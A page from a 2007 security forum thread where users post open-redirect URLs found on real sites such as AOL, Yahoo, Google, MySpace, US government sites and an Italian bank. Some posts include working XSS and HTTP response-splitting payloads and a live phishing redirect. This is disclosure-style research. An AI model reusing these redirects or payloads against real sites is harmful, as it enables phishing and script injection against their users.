Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011Next
Current Page: 8 of 11
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 20, 2007 03:16PM

http://http.edge.ru4.com/smartserve/ttplus?placement=tp-1125-033&target=http://www.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: February 21, 2007 10:06AM

Just saw this beauty in my inbox (takes you to a phishing site):

http://www.aol.com/ams/clickThruRedirect.adp?1073762100,2147779757x2147568413,http://0xca.0x47.0x6b.0xd9/~acid/www.moneybookers.com/index.htm

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 21, 2007 10:13AM

lol nice.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 22, 2007 04:29PM

http://club.pchome.net/rd.php?pid=137&tag=club_update_1&tgt=http://www.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: daltd
Date: February 23, 2007 02:34AM

http://www.pbs.org/teachersource/previews/redir/http://www.google.com
[[url=http://www.indiapress.org/directory/redirect/r.php?a=http:--www.google.com]www.indiapress.org[/url]]
[[url=http://www.madaboutjewellery.com/cgi-bin/click.cgi?link=www.google.com]www.madaboutjewellery.com[/url]]

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: February 23, 2007 05:10PM

http://www.kmstudio.com.ua/index.htm?http://www.google.com/

It is an XSS at the same time but who cares...

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 23, 2007 05:13PM

http://www.merck.com/htbin/redirects/redirector.pl?url=http://www.google.com
Same with this one (redirect/xss)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 24, 2007 05:10PM

this one is probably listed somewhere, but im too tired to check all the pages :O

http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=http://www.asdf.com

you can enter javascript:(bla) too but you will need to use some SE to make them click the link (you will understand when you try..)

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 24, 2007 05:11PM

http://www.sbc.net/redirect.asp?url=http://www.asdf.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 24, 2007 05:13PM

http://www.webmasterworld.com/re4.cgi?f=&d=&url=HTTP://www.google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 25, 2007 05:26AM

http://www.ojjdp.ncjrs.gov/exit.asp?go=1&url=http://www.google.com
They actually thought the go=1/0 thingy was going to stop redirects ;x -smashes head on table-

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: hiredhacker
Date: February 25, 2007 09:22AM

http://wwwm.meebo.com/redirect.php?http://www.hiredhacker.com

-peavey

--------------------------
http://www.hiredhacker.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 01, 2007 01:23PM

http://rds.yahoo.com/_ylt=A0geu9xGJ.dFshUA1TCl87UF/SIG=11qsb76n0/EXP=1172863174/**http://www.pentagon.gov

yahoo! another redirect on yahoo. they have a patch for the other areas of the site. Kinda weird they didn't patch this.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: March 01, 2007 02:25PM

That's really weird, the parameters are actually ignored. http://rds.yahoo.com/**http://www.google.com is enough, it will redirect to anything. That looks like a temporary malfunction, I tried this only two days ago and it would show a warning page.

Edit: rd.yahoo.com shows a warning but rds.yahoo.com doesn't. LOL



Edited 1 time(s). Last edit at 03/08/2007 09:10AM by trev.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 01, 2007 04:08PM

[removed]

Microsoft secure? Nooo way :P

And AOL too

http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100124311x1116333809x1077456677&_url=http://www.pentagon.gov



Edited 1 time(s). Last edit at 03/02/2007 06:51AM by Spyware.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 02, 2007 06:47AM

http://www.usashopcn.com/dg.asp?url=http://www.pentagon.gov

opens site in frame.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 02, 2007 07:25AM

http://www.defendamerica.mil/cgi-bin/bye.cgi?http://www.google.com/

.mil =]

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: SW
Date: March 05, 2007 12:53PM


Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: March 05, 2007 04:25PM

From a lurker:


I have found an interesting url redirect in the italian postepay card web site.

The interesting thing is the at today, there are developers that don't care about possible url encoding. So the result is that this url doesn't work:

https://bancopostaonline.poste.it/bpol/comuni/bpollogoff.asp?goto=http://www.google.com

because the / characters are stripped, instead the following url works:

https://bancopostaonline.poste.it/bpol/comuni/bpollogoff.asp?goto=http:%2f%2fwww.google.com

I contact you, beacause I understand that a url redirection in a web site search engine is not so bad, but in this case (a simil bank web site) the problem is not acceptable, also because on the web site there is a beautiful flash demo anti-phishing http://www.poste.it/online/phishing_video.shtml :)

oh, of course I have say nothing about this problem at the web site administrator :)

Ciao,
s4tan

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: March 06, 2007 07:10AM

That's HTTP Response Splitting as well:

https://bancopostaonline.poste.it/bpol/comuni/logoff.fcc?goto=%0AContent-Type:%20text/html;%20charset=UTF-7%0A%0A%2BADw%2Dscript%2BAD4%2Dalert(%22XSS%22);%2BADw%2D%2Fscript%2BAD4%2D

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: March 08, 2007 04:35PM

From BeNi:

http://www.google.com/local/add/changeLocale?currentLocation=http%3A%2F%2Fwww.mybeNi.tk&selectLocale=de_DE

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spikeman
Date: March 09, 2007 03:43AM

http://photobucket.com/images/0;url=HACKER%22http-equiv=refresh%3E

Can't quite get it to work right yet. Using forward slashes break it. I tried to get it to redirect to a picture in my album, but it escapes the quote so it doesn't work right.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: March 09, 2007 06:13AM

http://friends.newtelligence.net/clemensv/ct.ashx?url=http://google.com/

http://photobucket.com/images/0;url=http:%5Cgoogle.com%22%20http-equiv=refresh/ - works in Internet Explorer (it converts backwards slashes into forward slashes)

But it is probably easier to XSS this site:http://photobucket.com/images/%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: March 09, 2007 03:24PM

Very nice, haha!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: March 09, 2007 09:39PM

For the stile-pr0n lovers: http://x.stilenet.com/x/out.php?http://www.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: March 10, 2007 12:19AM

http://msxml.infospace.com/home/clickit/search?rawto=http://www.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: malorn
Date: March 10, 2007 02:27AM

http://news.google.com/news/url?sa=t&ct=us/5-1-0&fp=45f2d398d4ff6b31&ei=U2vyRcGuC5PqqAOevuCcCg&url=http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: March 10, 2007 04:42AM

http://www.redirect.to.url.com/search/result?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: March 10, 2007 09:58PM

All those parked domains, they must be good for something...

http://mopedshops.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://strippokerschool.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://onlinepkoergame.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://german-pinschers.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://kentuckywines.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://atv-store.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://free-magic.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/

4.700 more of those: http://www.ultimatedomains.com/
And another 500.000: http://www.fabulousdomains.com/

http://ageusa.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://aimus.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://myaddress.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://franchises.tv/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn

Hundreds more of those: http://www.google.com/search?q=%22This+domain+is+for+sale.+Please+contact+us+for+more+information.%22. Try to crack the "code" :)



Edited 3 time(s). Last edit at 03/10/2007 11:09PM by trev.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: kirke
Date: March 11, 2007 04:40AM

not really a redirect, but perfect frame spoofing (requires malware aka JavaScript enabled:)

http://www.kreditwerk.de/opener.html?kat=nav_links_UNSERUNTERNEHMEN__?cont=http://ha.ckers.org/images/stallowned.jpg

Options: ReplyQuote
Pages: Previous1234567891011Next
Current Page: 8 of 11


Sorry, only registered users may post in this forum.